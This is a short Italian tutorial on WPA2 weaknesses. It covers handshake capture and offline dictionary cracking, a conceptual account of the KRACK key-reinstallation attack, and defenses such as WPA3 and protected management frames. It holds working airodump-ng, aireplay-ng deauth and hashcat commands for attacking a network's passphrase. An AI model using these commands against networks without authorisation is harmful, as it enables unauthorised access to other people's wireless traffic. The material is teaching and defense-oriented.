WPA2: cattura dell'handshake e KRACK
WPA2-PSK deriva le chiavi da una passphrase tramite il 4-way handshake. Chi cattura l'handshake può attaccare la passphrase offline.
Cattura + crack
Si ascolta il canale, si forza una riconnessione con un deauth, si cattura l'handshake e si prova un dizionario:
airodump-ng -c 6 --bssid AA:BB.. -w cap wlan0mon
aireplay-ng --deauth 5 -a AA:BB.. wlan0mon
hashcat -m 22000 cap.hc22000 wordlist.txtKRACK
Key Reinstallation Attack: forzando la ritrasmissione del messaggio 3 del handshake, il client reinstalla la chiave e azzera il nonce, permettendo di decifrare/riprodurre pacchetti — senza conoscere la password.
Difesa
Passphrase lunghe e casuali (il crack offline muore). Client/AP patchati contro KRACK. Meglio ancora WPA3 (SAE), resistente al dizionario offline. 802.11w (protected management frames) blocca i deauth.